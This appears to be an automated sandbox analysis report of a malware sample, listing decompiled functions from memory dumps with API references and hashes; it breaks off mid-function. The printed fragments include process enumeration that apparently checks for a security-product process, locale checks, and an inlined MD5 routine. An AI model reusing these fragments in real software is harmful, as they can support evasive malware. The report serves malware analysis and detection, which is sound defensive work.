0x00f945fb
0x00f94602
0x00f9460d
0x00f94611
0x00f94611
0x00f9461a

APIs

Part of subcall function 00F91896: memcpy.NTDLL(00000000,00000110,00F91C1F,00F91C1F,?,?,00F91C1F,?,?,00F924E4,?), ref: 00F918CC
Part of subcall function 00F91896: memset.NTDLL ref: 00F91942
Part of subcall function 00F91896: memset.NTDLL ref: 00F91956

memcpy.NTDLL(00F91C1F,00F91C1F,00000000,00F91C1F,00F91C1F,00F91C1F,?,?,00F924E4,?,?,00F91C1F,?), ref: 00F94602

Part of subcall function 00F92A03: RtlFreeHeap.NTDLL(00000000,00000000,00F94072,00000000,?,?,00000000,?,?,?,?,?,?,00F944AE,00000000), ref: 00F92A0F

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
Instruction ID: fc7c644058b2ae2e3f858449c8b111c4ee39eab3fd6b9c052920f413d7e8e404
Opcode Fuzzy Hash: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
Instruction Fuzzy Hash: 62E08C779001297BDF226A94DC01EEBBF6C9F567E1F004020FE089A202E639DA10B7E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F919E7, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00F919E7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xf9a2d0; // 0x310d5a8
						_t2 = _t9 + 0xf9be04; // 0x73617661
						_push( &_v264);
						if( *0xf9a11c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00f919f2
0x00f919fc
0x00f91a00
0x00f91a0a
0x00f91a3b
0x00f91a11
0x00f91a16
0x00f91a23
0x00f91a2c
0x00f91a43
0x00f91a2e
0x00f91a36
0x00000000
0x00f91a36
0x00f91a44
0x00f91a45
0x00000000
0x00f91a45
0x00000000
0x00f91a3f
0x00f91a4b
0x00f91a50

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F919F7
Process32First.KERNEL32(00000000,?), ref: 00F91A0A
Process32Next.KERNEL32(00000000,?), ref: 00F91A36
CloseHandle.KERNEL32(00000000), ref: 00F91A45

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 35c2cee2cb755855d0b0b25cd17fff967040d9010bf0c9844d1fc15788aa6eb8
Instruction ID: 34c4d5fd02f3076874eee997bdcc09a590ac06ae629af3d5bed4f405f40d0f17
Opcode Fuzzy Hash: 35c2cee2cb755855d0b0b25cd17fff967040d9010bf0c9844d1fc15788aa6eb8
Instruction Fuzzy Hash: E8F090325061296AFB21A7369C49EEB76BCFBD5310F000062F906D2050EA289D5AAAB1

Uniqueness

Uniqueness Score: -1.00%

Function 1000146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x100041b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x100041bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x100041ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x100041a8 = _t5;
					 *0x100041b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x100041a4 = _t6;
					if(_t6 == 0) {
						 *0x100041a4 =  *0x100041a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x1000146d
0x1000147b
0x10001483
0x10001488
0x100014d2
0x100014d2
0x1000148a
0x10001492
0x100014ce
0x100014d0
0x10001494
0x10001494
0x10001499
0x100014a7
0x100014ac
0x100014b2
0x100014ba
0x100014bf
0x100014c1
0x100014c1
0x100014cb
0x100014cb

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,100017B8,74E063F0,00000000), ref: 1000147B
GetVersion.KERNEL32 ref: 1000148A
GetCurrentProcessId.KERNEL32 ref: 10001499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 100014B2

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: c22d7a1e861d9b5ab8ddadfe1c88c2622c48aec889c6041dcac182c51d9fc0db
Instruction ID: efac22bf22a3afc3d9ace4fbd9713eefa687801ef705910cd313f3733c03d1a3
Opcode Fuzzy Hash: c22d7a1e861d9b5ab8ddadfe1c88c2622c48aec889c6041dcac182c51d9fc0db
Instruction Fuzzy Hash: 4DF09AB0646231AFF7419F68AC897C23BE8F708BD1F02801AF245C90FCDBB044808B89

Uniqueness

Uniqueness Score: -1.00%

Function 10001566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10001566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4);
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x1000156a
0x1000157b
0x10001583
0x10001585
0x10001598
0x10001598
0x100015a2

APIs

GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,10001C5E,?,10001810,?,00000000,00000000,?,?,?,10001810), ref: 1000157B
GetSystemDefaultUILanguage.KERNEL32(?,?,10001C5E,?,10001810,?,00000000,00000000,?,?,?,10001810), ref: 10001585
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,10001C5E,?,10001810,?,00000000,00000000,?,?,?,10001810), ref: 10001598

Memory Dump Source

Source File: 00000001.00000002.813406704.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.813385466.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.813421377.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: 5f84b3e07f05f193ba364351682234d230a2a09b8bca2db832f1c80eb709f41c
Instruction ID: df3ac3be5dbe84dc617b29f9739526cb14f0281bd7b34e5de1eece9d3f9df1da
Opcode Fuzzy Hash: 5f84b3e07f05f193ba364351682234d230a2a09b8bca2db832f1c80eb709f41c
Instruction Fuzzy Hash: 0CE04FB8640249F6F700E7A19C0AFBE73BCEB0078AF504084FB01E60C4D6B49F04A725

Uniqueness

Uniqueness Score: -1.00%

Function 00F96609, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E00F96609(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x00f9660c
0x00f96617
0x00f9661a
0x00f9661d
0x00f9661e
0x00f9661e
0x00f96629
0x00f9663a
0x00f9663c
0x00f9663f
0x00f9663f
0x00f96642
0x00f96642
0x00f96645
0x00f96645
0x00f96648
0x00f96648
0x00f96665
0x00f96668
0x00f9667e
0x00f96681
0x00f9669b
0x00f9669e
0x00f966b4
0x00f966b7
0x00f966b9
0x00f966d1
0x00f966d4
0x00f966d7
0x00f966ef
0x00f966f2
0x00f9670c
0x00f9670f
0x00f96725
0x00f96728
0x00f9672a
0x00f96742
0x00f96747
0x00f9674a
0x00f96760
0x00f96763
0x00f9677d
0x00f96780
0x00f96796
0x00f96799
0x00f9679b
0x00f967b6
0x00f967b9
0x00f967d0
0x00f967d3
0x00f967d7
0x00f967f0
0x00f967f3
0x00f967f5
0x00f967f8
0x00f96813
0x00f96816
0x00f9682f
0x00f96832
0x00f96842
0x00f96845
0x00f9685d
0x00f96860
0x00f9687a
0x00f9687d
0x00f96895
0x00f96898
0x00f968ae
0x00f968b1
0x00f968c9
0x00f968cc
0x00f968e4
0x00f968e7
0x00f96901
0x00f96904
0x00f9691a
0x00f9691d
0x00f96935
0x00f96938
0x00f96952
0x00f96955
0x00f9696d
0x00f96970
0x00f96986
0x00f96989
0x00f969a1
0x00f969a4
0x00f969bc
0x00f969bf
0x00f969d1
0x00f969d4
0x00f969e6
0x00f969e9
0x00f969fb
0x00f969fe
0x00f96a02
0x00f96a12
0x00f96a15
0x00f96a23
0x00f96a26
0x00f96a38
0x00f96a3b
0x00f96a4f
0x00f96a52
0x00f96a54
0x00f96a64
0x00f96a67
0x00f96a79
0x00f96a7c
0x00f96a8a
0x00f96a8d
0x00f96a9f
0x00f96aa2
0x00f96aa6
0x00f96ab6
0x00f96ab9
0x00f96acb
0x00f96ace
0x00f96adc
0x00f96adf
0x00f96af1
0x00f96af4
0x00f96b06
0x00f96b09
0x00f96b1d
0x00f96b20
0x00f96b34
0x00f96b37
0x00f96b4b
0x00f96b4e
0x00f96b62
0x00f96b65
0x00f96b79
0x00f96b7c
0x00f96b90
0x00f96b95
0x00f96ba7
0x00f96baa
0x00f96bbe
0x00f96bc1
0x00f96bd5
0x00f96bd8
0x00f96bee
0x00f96bf1
0x00f96c05
0x00f96c08
0x00f96c1a
0x00f96c1d
0x00f96c31
0x00f96c34
0x00f96c48
0x00f96c4b
0x00f96c5f
0x00f96c68
0x00f96c6b
0x00f96c74
0x00f96c7d
0x00f96c85
0x00f96c8d
0x00f96c97
0x00f96cac

APIs

memset.NTDLL ref: 00F96CA0

Memory Dump Source

Source File: 00000001.00000002.810340952.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.810321795.0000000000F90000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810445470.0000000000F99000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810494847.0000000000F9A000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810512763.0000000000F9C000.00000002.00020000.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
Instruction ID: c3c91a10f58e4085e5f0fcd451d2630de94c9c60ef9b9d422357f2f417eab674
Opcode Fuzzy Hash: eab64be8417cd5ac1b5978694f6adc096df73fbdc74eaf4c815df7827f3802de
Instruction Fuzzy Hash: F022837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00F981CD, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F981CD(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xf9a330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xf9a378 = 1;
										__eflags =  *0xf9a378;
										if( *0xf9a378 != 0) {
											goto L60;
										}
										_t84 =  *0xf9a330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xf9a378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xf9a330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xf9a338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xf9a334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xf9a338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xf9a338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xf9a378 = 1;
							__eflags =  *0xf9a378;
							if( *0xf9a378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xf9a338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xf9a338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xf9a378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xf9a338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
